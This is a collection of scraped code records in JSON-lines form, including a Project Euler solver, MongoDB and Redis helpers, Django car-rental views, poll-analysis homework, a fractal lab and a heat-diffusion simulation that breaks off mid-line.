+{"seq_id":"194713711","text":"\"\"\"\n12.\n1부터 n까지의 자연수를 차례로 더하여 구해진 값을 삼각수라고 합니다.\n예를 들어 7번째 삼각수는 1 + 2 + 3 + 4 + 5 + 6 + 7 = 28이 됩니다.\n이런 식으로 삼각수를 구해 나가면 다음과 같습니다.\n\n1, 3, 6, 10, 15, 21, 28, 36, 45, 55, ...\n이 삼각수들의 약수를 구해봅시다.\n\n 1: 1\n 3: 1, 3\n 6: 1, 2, 3, 6\n10: 1, 2, 5, 10\n15: 1, 3, 5, 15\n21: 1, 3, 7, 21\n28: 1, 2, 4, 7, 14, 28\n위에서 보듯이, 5개 이상의 약수를 갖는 첫번째 삼각수는 28입니다.\n\n그러면 500개 이상의 약수를 갖는 가장 작은 삼각수는 얼마입니까?\n\"\"\"\n\ndef getDivisor(start, limit):\n sum =0\n n =start\n while True :\n #divisors=[]\n divisorCount =0\n lastNum=0\n sum+=n\n #print(sum)\n #alfNum=int(sum/2)\n for i in range(1,sum):\n mok=int(sum / i)\n #print(mok)\n if( sum == mok *i):\n # 약수\n if( lastNum ==mok):\n break\n #divisors.append(i)\n divisorCount+=1\n lastNum =i\n if( mok == i):\n #제곱근\n break\n #print(divisors)\n if(divisorCount*2 >=limit ):\n return sum\n n +=1\n\nprint(getDivisor(1, 500))","sub_path":"euler/problem12/eunsil.py","file_name":"eunsil.py","file_ext":"py","file_size_in_byte":1337,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"115696970","text":"from bson.objectid import ObjectId\nfrom pymongo.collection import ReturnDocument\n\n\ndef find_one_latest(collection):\n '''Returns newest/latest object, stripped of the object id, or None if no object exists'''\n try:\n return collection.find({}, {'_id': False}).sort([('_id', -1)]).limit(1).next()\n except StopIteration:\n return None\n\n\ndef find_id_latest(collection):\n '''Returns object id of newest/latest object, or None if no object exists'''\n try:\n return collection.find().sort([('_id', -1)]).limit(1).next()['_id']\n except StopIteration:\n return None\n\n\ndef update_run_state(\n collection,\n task_id,\n state=\"UNKNOWN\"\n):\n '''Update state of workflow run'''\n return collection.find_one_and_update(\n {\"task_id\": task_id},\n {\"$set\": {\"api.state\": state}},\n return_document=ReturnDocument.AFTER\n )\n\n\ndef upsert_fields_in_root_object(\n collection,\n task_id,\n root,\n **kwargs\n):\n '''Insert (or update) fields in(to) the same root (object) field'''\n return collection.find_one_and_update(\n {\"task_id\": task_id},\n {\"$set\": {\".\".join([root, key]):value for (key,value) in kwargs.items()}},\n return_document=ReturnDocument.AFTER\n )\n\n\ndef update_tes_task_state(\n collection,\n task_id,\n tes_id,\n state\n):\n \n '''Update 'state' field in TES task log'''\n\n return collection.find_one_and_update(\n {\"task_id\": task_id, \"api.task_logs\": {\"$elemMatch\": {\"id\": tes_id}}},\n {\"$set\" : {\"api.task_logs.$.state\" : state}},\n return_document=ReturnDocument.AFTER\n )\n\n\ndef append_to_tes_task_logs(\n collection,\n task_id,\n tes_log\n):\n\n '''Append task log to TES task logs'''\n\n return collection.find_one_and_update(\n {\"task_id\": task_id},\n {'$push': {'api.task_logs': tes_log}},\n return_document=ReturnDocument.AFTER\n )","sub_path":"wes_elixir/database/db_utils.py","file_name":"db_utils.py","file_ext":"py","file_size_in_byte":1901,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"183913715","text":"import asyncio\nimport config\nimport aioredis\nfrom aioredis.pubsub import Receiver\nimport websockets\nfrom config import HEARTBEAT_DURATION, HEARBEAT_ON, DB_PING\nfrom constants import EXCHANGE_ID\nimport json\nfrom common import RedisQueryEngine\nfrom decimal import Decimal\n\n\nclass RedisToWS:\n\n def __init__(self):\n self.loop = asyncio.get_event_loop()\n self.loop.set_debug(True)\n self.query_maker = RedisQueryEngine(EXCHANGE_ID)\n\n def start(self):\n self.loop.run_until_complete(\n websockets.serve(self.ws_handler, '0.0.0.0', 8765),\n )\n self.loop.run_forever()\n\n async def ws_handler(self, websocket, path):\n # gather redis_ws_handler and heartbeat_ws_heandler\n await asyncio.gather(\n self.redis_ping(websocket),\n self.redis_orders_ws_handler(websocket),\n self.heartbeat_ws_handler(websocket),\n self.redis_trades_ws_handler(websocket),\n )\n\n async def get_redis_connection(self):\n return await aioredis.create_connection((config.REDIS_PATH, 6379))\n\n async def redis_query(self, query, *query_args):\n if DB_PING:\n conn = await self.get_redis_connection()\n return await conn.execute(query, *query_args, encoding='utf-8')\n\n async def redis_ping(self, websocket):\n conn = await self.get_redis_connection()\n res = await self.redis_query('ping')\n await websocket.send(res)\n\n async def get_order_state(self, message):\n order_data = json.loads(message[1])\n side = order_data['side']\n price = order_data['price']\n pair = order_data['pair']\n userid = order_data['userid']\n query = self.query_maker.get_order_ids_by_price(pair, side, price)\n conn = await self.get_redis_connection()\n order_ids = await self.redis_query(*query)\n # this order_ids is the list of all orderids at this price, should contain just one item if no other order\n # if nothing is there that means it got matched and no amount (zero) is th latest state\n if order_ids:\n queries = [self.query_maker.get_order_amount_by_order_id(i) for i in order_ids]\n amounts = [await self.redis_query(*q) for q in queries]\n amount = str(sum(Decimal(i) for i in amounts))\n else:\n amount = '0'\n orders_state = {'price':price, 'side':side, 'amount':amount, 'userid':userid, 'n_orders':len(order_ids)}\n return str(orders_state)\n\n async def redis_orders_ws_handler(self, websocket):\n connection = await self.get_redis_connection()\n receiver = Receiver()\n connection.execute_pubsub('subscribe', receiver.channel('orders'))\n while (await receiver.wait_message()):\n order_delta = await receiver.get()\n actual_order = await self.get_order_state(order_delta)\n await websocket.send(actual_order)\n\n async def redis_trades_ws_handler(self, websocket):\n receiver = Receiver()\n connection = await self.get_redis_connection()\n connection.execute_pubsub('subscribe', receiver.channel('trades'))\n while (await receiver.wait_message()):\n message = await receiver.get()\n await websocket.send(message[1].decode('utf-8'))\n\n async def heartbeat_ws_handler(self, websocket):\n while HEARBEAT_ON:\n await asyncio.sleep(HEARTBEAT_DURATION)\n #message = str(await self.redis_query(\n # 'ZRANGEBYSCORE',\n # 'ASKS:exchange-1:ETHUSD',\n # '192120000',\n # '192120000',\n #))\n await websocket.send('💚')\n #await websocket.send(message)\n\n\nif __name__ == '__main__':\n feed = RedisToWS()\n feed.start()\n","sub_path":"src/ws.py","file_name":"ws.py","file_ext":"py","file_size_in_byte":3783,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"136066653","text":"\"\"\"main URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/2.1/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.urls import path, include\nfrom webapp.views import PostListView, PostDetailView, PostCreateView, PostDeleteView, PostUpdateView, UserListView, UserDetailView\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n path('accounts/', include('webauth.urls', namespace='webauth')),\n path('', PostListView.as_view(), name='post_list'),\n path('post/', PostDetailView.as_view(), name='post_detail'),\n path('post/create', PostCreateView.as_view(), name='post_create'),\n path('post//post_delete', PostDeleteView.as_view(), name='post_delete'),\n path('post//update', PostUpdateView.as_view(), name='post_update'),\n path('user', UserListView.as_view(), name='user_list'),\n path('user/', UserDetailView.as_view(), name='user_detail')\n\n]\n","sub_path":"source/main/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1454,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"154179340","text":"from django.shortcuts import render, render_to_response\nfrom .models import Vehicle, Customer, Reservation, Suggestion, Location\nfrom django.http import HttpResponse\nfrom django.http import HttpResponseRedirect\nfrom django.db.models import Q\nfrom .forms import *\nimport pytz\nfrom django.contrib import messages\nimport datetime\nfrom datetime import datetime as dt\nfrom datetime import timedelta\nfrom django.db.models import Q\n\n\n# Create your views here.\n\ndef car_return_form(request, r_id, vin_no):\n if not request.user.is_authenticated :\n return HttpResponseRedirect('/zip/login')\n retForm = VehicleReturnForm(request.POST or None)\n suggestionForm = VehicleReturnSuggestionForm(request.POST or None)\n reservation = Reservation.objects.get(id=r_id)\n\n # api here\n def calculate_rental_charge(initialResTime, initialRetTime, actualRetTime, rentPerHour1, rentPerHour2,\n lateFee):\n finalFee = 0\n\n def calculateHours(a, b):\n print(type(a))\n seconds = a - b\n return seconds // 3600\n\n regularHours = calculateHours(initialRetTime.timestamp(), initialResTime.timestamp())\n try:\n extraHours = calculateHours(datetime.datetime.now().timestamp(), initialRetTime.timestamp())\n except:\n extraHours=0\n\n base = 0\n advance = 0\n if regularHours > rentPerHour2[0]:\n finalFee += rentPerHour1[1] * rentPerHour1[2]\n base = finalFee\n finalFee += (regularHours - rentPerHour1[1]) * rentPerHour2[2]\n advance = finalFee - base\n else:\n finalFee += regularHours * rentPerHour1[2]\n base = finalFee\n chargeExtra = 0\n if extraHours > 0:\n chargeExtra = extraHours * lateFee\n print(base, advance)\n return base, advance, chargeExtra, finalFee + chargeExtra\n\n vehicle = Vehicle.objects.get(vin_no=vin_no)\n base, advance, lateCharge, total = calculate_rental_charge(reservation.reservation_datetime,\n reservation.return_datetime,\n reservation.actual_returntime, [1, 5, vehicle.basic_fee],\n [5, 72, vehicle.advanced_fee],\n vehicle.late_fee)\n\n obj = {'base': base, 'advance': advance, 'lateCharge': lateCharge, 'total': total}\n context = {\n 'retForm': retForm,\n 'reservation': reservation,\n 'suggestionForm': suggestionForm,\n 'obj': obj,\n }\n\n if retForm.is_valid() and request.user.is_authenticated and suggestionForm.is_valid():\n reservation = Reservation.objects.get(id=r_id)\n rental_location = reservation.rental_location\n loc = Location.objects.get(rental_location=rental_location)\n loc.no_of_vehicles = loc.no_of_vehicles + 1\n loc.save()\n\n print(reservation.reservation_status)\n reservation.reservation_status = 'RTD'\n reservation.actual_returntime = datetime.datetime.now()\n reservation.save()\n\n # change here\n\n suggestion = suggestionForm.cleaned_data['suggestion']\n Suggestion.objects.create(user=request.user, reservation_id=reservation, suggestion=suggestion)\n messages.success(request, 'Rental Vehicle Returned Successfully!!')\n return HttpResponseRedirect('/user_reservation')\n\n return render(request, 'zip/return_details.html', context)\n\n\ndef car_request_form(request, make_model, vin_no, rental_location):\n\n if not request.user.is_authenticated :\n return HttpResponseRedirect('/zip/login')\n customer = Customer.objects.get(user=request.user)\n if customer.last_membership_date < datetime.date.today():\n messages.error(request, 'get membership')\n return HttpResponseRedirect('/membership')\n form = VehicleRequestForm(request.POST or None)\n # customer=Customer.objects.get(user=request.user)\n context = {\n 'form': form,\n 'make_model': make_model,\n 'vin_no': vin_no,\n 'rental_location': rental_location\n }\n\n if customer.last_membership_date < datetime.date.today():\n messages.error(request, 'get membership')\n return HttpResponseRedirect('')\n\n if form.is_valid() and request.user.is_authenticated and customer.last_membership_date >= datetime.date.today():\n\n v = Vehicle.objects.get(vin_no=vin_no)\n rental_location = v.rental_location\n loc = Location.objects.get(rental_location=rental_location)\n loc.no_of_vehicles = loc.no_of_vehicles - 1\n loc.save()\n reservation_datetime = form.cleaned_data['reservation_datetime']\n return_datetime = form.cleaned_data['return_datetime']\n # print(reservation_datetime,return_datetime)\n rental_charge = 0\n tz = pytz.timezone('US/Pacific')\n time = datetime.datetime.now(tz).strftime('%Y-%m-%d %H:%M')\n if str(reservation_datetime) < time:\n messages.error(request, 'Wrong Reservation Date!')\n return HttpResponseRedirect(request.path_info)\n if return_datetime <= reservation_datetime:\n messages.error(request, 'Wrong Return Date!')\n return HttpResponseRedirect(request.path_info)\n if (return_datetime - reservation_datetime).days >= 3:\n messages.error(request, 'Maximum 3 days allowed!')\n return HttpResponseRedirect(request.path_info)\n flag = 0\n reservation_datetime = reservation_datetime.strftime('%Y-%m-%d %H:%M')\n return_datetime = return_datetime.strftime('%Y-%m-%d %H:%M')\n reservation_vin_location = Reservation.objects.filter(vin_no=vin_no).filter(\n rental_location=rental_location).filter(~Q(reservation_status=\"RTD\")).all()\n if reservation_vin_location.count() != 0:\n reserved_time = Reservation.objects.filter(vin_no=vin_no).filter(rental_location=rental_location).filter(\n ~Q(reservation_status=\"RTD\")).values('reservation_datetime', 'return_datetime')\n start, end = [], []\n for reserved in reserved_time:\n s = reserved['reservation_datetime']\n s = s.strftime(\"%Y-%m-%d %H:%M\")\n start.append(s)\n e = reserved['return_datetime']\n e = e.strftime(\"%Y-%m-%d %H:%M\")\n end.append(e)\n # messages.info(request,''+str(start)+str(end))\n start.sort()\n end.sort()\n if str(return_datetime) <= start[0]:\n flag = 1\n for i in range(len(end) - 1):\n if str(reservation_datetime) >= end[i]:\n if str(return_datetime) <= start[i + 1]:\n ## Reservation can be done\n flag = 1\n if str(reservation_datetime) >= end[-1]:\n flag = 1\n if flag == 1:\n reservation = Reservation(user=request.user.username, rental_location=rental_location,\n rental_charge=rental_charge, vin_no=vin_no,\n reservation_datetime=reservation_datetime, return_datetime=return_datetime)\n reservation.save()\n messages.success(request, \"Thank you for the reservation. Enjoy you're ride!\")\n return HttpResponseRedirect('/user_reservation')\n else:\n messages.info(request,\n 'Reservation cannot be done at this location and time. Available vehicles at alternate locations.')\n reserved_vehicles = Reservation.objects.filter(reservation_datetime=reservation_datetime).filter(\n return_datetime=return_datetime).filter(~Q(reservation_status=\"RTD\")).values('vin_no')\n all_vehicles = Vehicle.objects.values('vin_no')\n rv, al = [], []\n for vehicle in reserved_vehicles:\n rv.append(vehicle['vin_no'])\n for vehicle in all_vehicles:\n al.append(vehicle['vin_no'])\n available_vehicles = list(set(al) - set(rv))\n vehicles = Vehicle.objects.filter(pk__in=available_vehicles)\n context = {\n 'vehicles': vehicles\n }\n return render(request, 'zip/car_detail.html', context)\n else:\n reservation = Reservation(user=request.user.username, rental_location=rental_location,\n rental_charge=rental_charge, vin_no=vin_no,\n reservation_datetime=reservation_datetime, return_datetime=return_datetime)\n reservation.save()\n messages.success(request, \"Thank you for the reservation. Enjoy you're ride!\")\n return HttpResponseRedirect('/user_reservation')\n return render(request, 'zip/car_request.html', context)\n\n\ndef car_search_form_view(request):\n\n if not request.user.is_authenticated :\n return HttpResponseRedirect('/zip/login')\n customer = Customer.objects.get(user=request.user)\n\n if customer.last_membership_date < datetime.date.today():\n messages.error(request, 'get membership')\n return HttpResponseRedirect('/membership')\n\n if request.method == 'POST':\n form = VehicleSearchForm(request.POST)\n if form.is_valid() and request.user.is_authenticated:\n make_model_query = form.cleaned_data['make_model']\n rental_location_query = form.cleaned_data['rental_location']\n vehicle_type_query = form.cleaned_data['vehicle_type']\n vehicles = Vehicle.objects.filter(make_model__contains=make_model_query).filter(\n rental_location=rental_location_query).filter(vehicle_type__contains=vehicle_type_query)\n if vehicles.count() == 0:\n messages.error(request, make_model_query + ' vehicle is not available at ' + str(rental_location_query))\n alternate_location = Vehicle.objects.filter(make_model__contains=make_model_query).filter(\n vehicle_type__contains=vehicle_type_query).first()\n vehicles = Vehicle.objects.filter(make_model__contains=make_model_query).filter(\n vehicle_type__contains=vehicle_type_query).all()\n if alternate_location != None:\n messages.success(request, 'The Vehicle is available at ' + str(alternate_location.rental_location))\n context = {\n 'vehicles': vehicles\n }\n return render(request, 'zip/car_detail.html', context)\n\n form = VehicleSearchForm(request.POST or None)\n context = {\n 'form': form\n }\n return render(request, 'zip/car_search.html', context)\n\n\ndef default_view(request):\n return render(request, 'base.html')\n\n\ndef locations_add_view(request):\n import csv\n global line\n path = '/Users/lokesh/Desktop/sp20-cmpe-202-sec-49-team-project-fourreal/locations.csv'\n\n with open(path) as f:\n reader = csv.reader(f)\n for row in reader:\n _, created = Location.objects.get_or_create(\n rental_location=row[0],\n rental_location_address=row[1],\n vehicle_capacity=row[2],\n no_of_vehicles=row[3],\n )\n\n\ndef car_view(request):\n # context={}\n if not request.user.is_authenticated :\n return HttpResponseRedirect('/zip/login')\n customer = Customer.objects.get(user=request.user)\n if customer.last_membership_date < datetime.date.today():\n messages.error(request, 'get membership')\n return HttpResponseRedirect('/membership')\n\n vehicles = Vehicle.objects.all()\n\n context = {\n 'vehicles': vehicles\n }\n return render(request, 'zip/car_detail.html', context)\n\n\n# cancelling reservation\ndef cancel_reservation(request, r_id):\n if not request.user.is_authenticated :\n return HttpResponseRedirect('/zip/login')\n reservation = Reservation.objects.get(id=r_id)\n currentTime = datetime.datetime.now()\n initialResTime = reservation.reservation_datetime\n try:\n seconds = (currentTime.timestamp() - initialResTime.timestamp())\n except:\n seconds=0\n\n if -(seconds // 3600) <= 1:\n reservation.reservation_status = 'RTD'\n reservation.save()\n ## Minimum one-hour charge applied\n messages.success(request, \"The Reservation has been cancelled successfully!, Your card will be charged 15$ cancelation fee\")\n return HttpResponseRedirect('/user_reservation')\n else:\n reservation.reservation_status = 'RTD'\n reservation.save()\n\n messages.success(request, \"The Reservation has been cancelled successfully!, You have not been charged anything\")\n return HttpResponseRedirect('/user_reservation')\n\n\n# def car_request_view(request,car):\n\n# # User.objects.filer to see if user is legit or not\n# # See if car is available or not\n# # if user exists and car exists register it\n# if request.user.is_authenticated:\n# user=request.user.get_username()\n# status='Pending'\n# transaction=Reservation(user=user, car=car, status=status)\n# transaction.save()\n# return render(request, 'zip/car_search.html')\n\n\ndef car_all_search_form_view(request):\n if not request.user.is_authenticated :\n return HttpResponseRedirect('/zip/login')\n customer = Customer.objects.get(user=request.user)\n if customer.last_membership_date < datetime.date.today():\n messages.error(request, 'get membership')\n return HttpResponseRedirect('/membership')\n\n if request.method == 'POST':\n form = VehicleAllSearchForm(request.POST or None)\n if form.is_valid() and request.user.is_authenticated:\n query = form.cleaned_data['query']\n print(query)\n location = Location.objects.filter(rental_location__icontains=query)\n print(location)\n vehicles = Vehicle.objects.filter(Q(make_model__icontains=query) | Q(rental_location__in=location))\n print(vehicles)\n\n if vehicles.count() == 0:\n messages.success(request, 'No Results found ')\n context = {\n 'vehicles': vehicles\n }\n return render(request, 'zip/car_detail.html', context)\n\n form = VehicleAllSearchForm(request.POST or None)\n context = {\n 'form': form\n }\n return render(request, 'zip/car_search.html', context)\n","sub_path":"zip/car_views.py","file_name":"car_views.py","file_ext":"py","file_size_in_byte":14698,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"371008640","text":"import time\n\npoll_rows1 = [{\"ID\": 1, \"State\": \"WA\", \"Pollster\": \"A\", \"Date\": \"Jan 07 2010\"},\n {\"ID\": 2, \"State\": \"WA\", \"Pollster\": \"B\", \"Date\": \"Mar 21 2010\"},\n {\"ID\": 3, \"State\": \"WA\", \"Pollster\": \"A\", \"Date\": \"Jan 08 2010\"},\n {\"ID\": 4, \"State\": \"OR\", \"Pollster\": \"A\", \"Date\": \"Feb 10 2010\"},\n {\"ID\": 5, \"State\": \"WA\", \"Pollster\": \"B\", \"Date\": \"Feb 10 2010\"},\n {\"ID\": 6, \"State\": \"WA\", \"Pollster\": \"B\", \"Date\": \"Mar 22 2010\"}]\n\nrows1 = [{'State': 'WA', 'Dem': '1.0', 'Rep': '0.1', 'Date': 'Nov 04 2008', 'Pollster': 'PPP'}]\nrows2 = [{'State': 'WA', 'Dem': '1.0', 'Rep': '0.1', 'Date': 'Nov 05 2008', 'Pollster': 'PPP'},\n {'State': 'CA', 'Dem': '1.0', 'Rep': '10.3', 'Date': 'Nov 04 2008', 'Pollster': 'PPP'}]\nrows3 = [{'State': 'WA', 'Dem': '1.0', 'Rep': '0.1', 'Date': 'Nov 05 2008', 'Pollster': 'PPP'},\n {'State': 'CA', 'Dem': '2.1', 'Rep': '3.2', 'Date': 'Nov 04 2008', 'Pollster': 'PPP'},\n {'State': 'WA', 'Dem': '9.1', 'Rep': '7.1', 'Date': 'Nov 05 2008', 'Pollster': 'IPSOS'},\n {'State': 'CA', 'Dem': '1.0', 'Rep': '10.3', 'Date': 'Nov 04 2008', 'Pollster': 'IPSOS'}]\nrows4 = [{'State': 'WA', 'Dem': '1.0', 'Rep': '0.1', 'Date': 'Nov 05 2008', 'Pollster': 'PPP'},\n {'State': 'WA', 'Dem': '1.0', 'Rep': '10.3', 'Date': 'Nov 04 2008', 'Pollster': 'PPP'}]\nrows5 = [{'State': 'WA', 'Dem': '1.0', 'Rep': '0.1', 'Date': 'Nov 05 2008', 'Pollster': 'PPP'},\n {'State': 'CA', 'Dem': '2.1', 'Rep': '3.2', 'Date': 'Nov 04 2008', 'Pollster': 'PPP'},\n {'State': 'OR', 'Dem': '9.1', 'Rep': '7.1', 'Date': 'Nov 05 2008', 'Pollster': 'IPSOS'}]\n\n\ndef row_to_edge(row):\n \"\"\"\n Given an *ElectionDataRow* or *PollDataRow*, returns the\n Democratic *Edge* in that *State*.\n \"\"\"\n return (float(row[\"Dem\"]) - float(row[\"Rep\"]))\n\n\ndef state_edges(election_result_rows):\n \"\"\"\n Given a list of *ElectionDataRow*s, returns *StateEdge*s.\n The input list has no duplicate *States*;\n that is, each *State* is represented at most once in the input list.\n \"\"\"\n d = {}\n for row in election_result_rows:\n state = row['State']\n d[state] = row_to_edge(row)\n return d\n\n\ndef earlier_date(date1, date2):\n \"\"\"\n Given two dates as strings (formatted like \"Oct 06 2012\"), returns True if\n date1 is before date2.\n \"\"\"\n return (time.strptime(date1, \"%b %d %Y\") < time.strptime(date2, \"%b %d %Y\"))\n\n\ndef most_recent_poll_row(poll_rows, pollster, state):\n \"\"\"\n Given a list of *PollDataRow*s, returns the most recent row with the\n specified *Pollster* and *State*. If no such row exists, returns None.\n \"\"\"\n date1 = 'Jan 01 1969'\n result = []\n for row in poll_rows:\n if (row['State'] == state and row['Pollster'] == pollster):\n date2 = row['Date']\n if earlier_date(date1, date2):\n date1 = date2\n result = row\n if (result == []):\n return None\n else:\n return result\n\n\ndef unique_column_values(rows, column_name):\n # Create a set of values from PollDataRow\n values = set()\n for row in rows:\n if (row[column_name]) not in values:\n values.add(row[column_name])\n return values\n\n\ndef pollster_predictions(poll_rows):\n pollsters = unique_column_values(poll_rows, 'Pollster')\n states = unique_column_values(poll_rows, 'State')\n pp = {}\n for p in pollsters:\n pp[p] = {}\n for s in states:\n if most_recent_poll_row(poll_rows, p, s):\n edge = state_edges([(most_recent_poll_row(poll_rows, p, s))])\n pp[p][s] = edge[s]\n return pp\n\nprint(pollster_predictions(rows3))\n","sub_path":"hw/hw14/homework14/problem3.py","file_name":"problem3.py","file_ext":"py","file_size_in_byte":3707,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"127280710","text":"import matplotlib\n# Uncomment the line below if working in cs50\n# matplotlib.use('agg')\nimport matplotlib.pyplot as plt\nimport sys\n\nfrom math import sin, cos, radians\n\nCOLORS = ['#000000', '#0000CC', '#00CC00', '#00CCCC', '#CC0000', '#CC00CC', '#CCCC00']\n\n\n# Example Fractal\ndef rec_fun(x, y, length, h, color_idx):\n if h == 0:\n return\n new_color_idx = (color_idx + 1) % len(COLORS)\n \n plt.plot([x,x],[y-length/2,y+length/2], color=COLORS[color_idx])\n plt.plot([x-length/2,x+length/2],[y,y], color=COLORS[color_idx])\n \n rec_fun(x-length/4, y-length/4, length/2, h-1, new_color_idx)\n rec_fun(x-length/4, y+length/4, length/2, h-1, new_color_idx)\n rec_fun(x+length/4, y-length/4, length/2, h-1, new_color_idx)\n rec_fun(x+length/4, y+length/4, length/2, h-1, new_color_idx)\n\n\n# Easier Fractal Than Snowflake\ndef sierpinski_triangle(x, y, length, h, color_idx):\n # To be implemented\n pass\n\n\n# More Advanced (But Satisfying) Fractal\ndef snowflake(x, y, length, h):\n # To be implemented\n pass\n\n\ndef main():\n if len(sys.argv) < 3:\n print('Invalid arguments', 'Usage: python fractals.py fractal_type iterations', sep='\\n')\n exit(1)\n\n name = 'default'\n \n if sys.argv[1] == 'r':\n rec_fun(0, 0, 512, int(sys.argv[2]), 0)\n name = 'rectangle'\n elif sys.argv[1] == 's':\n snowflake(0, 0, 512, int(sys.argv[2]))\n name = 'snowflake'\n elif sys.argv[1] == 't':\n sierpinski_triangle(0, 0, 512, int(sys.argv[2]), 0)\n name = 'sierpinski'\n else:\n print('Invalid fractal type', 'Options: r, s, t (for rectangle, snowflake, and sierpinski triangle)', sep='\\n')\n exit(2)\n if matplotlib.get_backend().lower() == 'agg':\n plt.savefig(name + '.jpg', bbox_inches='tight')\n else:\n plt.show()\n\n\nmain()\n","sub_path":"lab-06/fractals.py","file_name":"fractals.py","file_ext":"py","file_size_in_byte":1829,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"45543782","text":"# coding=utf-8\nimport sys\nreload(sys)\nsys.setdefaultencoding('utf-8')\n\nimport Tkinter as tk\nfrom alan_diary import *\nfrom ScrolledText import ScrolledText\n\ndef enter_and_print(event):\n append_text(var.get())\n text_output.delete(0.0,'end')\n text_output.insert(0.0,get_text())\n var.set('')\n\nroot = tk.Tk()\nroot.title(\"Alan's diary\")\n\nvar = tk.StringVar(value=\"What do you want to write today?\")\n\ntext_input = tk.Entry(root, textvariable=var, width=36, bd=5)\ntext_input.pack()\n\nroot.bind('', enter_and_print)\n\ntext_output = ScrolledText(root,width=46)\ntext_output.pack()\n\nroot.mainloop()\n","sub_path":"_src/om2py2w/2wex0/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":605,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"193879721","text":"from rest_framework import generics, viewsets, status\nfrom rest_framework.decorators import action\nfrom rest_framework.response import Response\n\nfrom ..publications.serializer import PublicationSerializer\nfrom ..comments.serializer import CommentSerializer\nfrom ..publications.models import Publication\nfrom ..tags.serializer import TagSerializer\nfrom ..tags.models import Tag\n\n\nclass TagViewSet(viewsets.ModelViewSet):\n queryset = Publication.objects.all()\n serializer_class = PublicationSerializer\n\n @action(methods=['GET', 'POST', 'DELETE'], detail=True)\n def tags(self, request, pk=None):\n Publication = self.get_object()\n\n if request.method == 'GET':\n serialized = TagSerializer(Publication.tags, many=True)\n return Response(status=status.HTTP_200_OK, data=serialized.data)\n\n if request.method == 'POST':\n publications_id = request.data['publications']\n for tag_id in publications_id:\n tags = Publication.objects.get(id=int(tag_id))\n publications_id.publicaciones.add(tags)\n return Response(status=status.HTTP_201_CREATED)\n\n if request.method == 'DELETE':\n paublications_id = request.data['publications']\n for tag_id in publications_id:\n tag = Tag.objects.get(id=int(tag_id))\n publications.tags.remove(tag)\n return Response(status=status.HTTP_204_NO_CONTENT)\n","sub_path":"apps/tags/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1460,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"602553851","text":"import numpy as np \nimport mac3dNew as M \nimport matplotlib.pyplot as plt\nimport h5py\n\nclass Mesh:\n\tdef __init__(self, N, padwidth, dt):\n\t\tself.dt = dt\n\t\tself.p = padwidth #Number of extra points in padding\n\t\tself.T = M.Array([N+2*padwidth,N+2*padwidth,N+2*padwidth])\n\t\tself.rhs = M.Array([N+2*padwidth,N+2*padwidth,N+2*padwidth])\n\t\tself.I = M.Range(padwidth, padwidth+N)\n\t\tself.J = M.Range(padwidth, padwidth+N)\n\t\tself.K = M.Range(padwidth, padwidth+N)\n\t\tself.size = N\n\t\tself.energy = []\n\n\tdef initfield(self):\n\t\tx = np.linspace(-np.pi, np.pi, self.size)\n\t\tself.dx = x[1]-x[0]\n\t\tself.dy = self.dx\n\t\tself.dz = self.dx\n\t\tY,X,Z = np.meshgrid(x,x,x)\n\t\tself.T[self.I,self.J,self.K] = np.exp(-X*X - Y*Y - Z*Z)\n\n\t# def exportfield(self, stepnumber):\n\t# \tAll = M.Range('all')\n\n # #Write out the temperature\n # fileOut = h5py.File('temperature.h5', 'w')\n # fileOut['Tat'+str(stepnumber)] = self.T[All,All,All]\n # fileOut.close()\n\n\tdef updatepadding(self):\n\t\tpad = M.Range(0, self.p)\n\t\tAll = M.Range(kind='all')\n\t\t#x padding\n\t\tself.T[pad, All, All] = self.T[pad+self.size, All, All]\n\t\tself.T[pad+self.p+self.size, All, All] = self.T[pad+self.p, All, All]\n\t\t#y padding\n\t\tself.T[All, pad, All] = self.T[All, pad+self.size, All]\n\t\tself.T[All, pad+self.p+self.size, All] = self.T[All, pad+self.p, All]\n\t\t#z padding\n\t\t#y padding\n\t\tself.T[All, All, pad] = self.T[All, All, pad+self.size]\n\t\tself.T[All, All, pad+self.p+self.size] = self.T[All, All, pad+self.p]\n\n\tdef computeRhs(self):\n\t\tI = self.I\n\t\tJ = self.J\n\t\tK = self.K\n\t\tT = self.T\n\t\tself.updatepadding()\n\t\tself.rhs[I,J,K] = ((T[I+1,J,K] -2*T[I,J,K] +T[I-1,J,K])/(self.dx**2)+\n\t\t\t\t\t\t (T[I,J+1,K] -2*T[I,J,K] +T[I,J-1,K])/(self.dy**2)+\n\t\t\t\t\t\t (T[I,J,K+1] -2*T[I,J,K] +T[I,J,K-1])/(self.dz**2))\n\n\tdef computeNorm(self):\n\t\tT = self.T \n\t\tI = self.I \n\t\tJ = self.J\n\t\tK = self.K\n\t\treturn np.sum(T[I,J,K]*T[I,J,K])/(T.shape()[0]*T.shape()[1]*T.shape()[2])\n\n\tdef advanceBy(self, steps):\n\t\tAll = M.Range(kind='all')\n\t\tfor i in range(steps):\n\t\t\tself.energy.append(self.computeNorm())\n\t\t\tself.computeRhs()\n\t\t\tself.T[All,All,All] += self.dt*self.rhs[All, All, 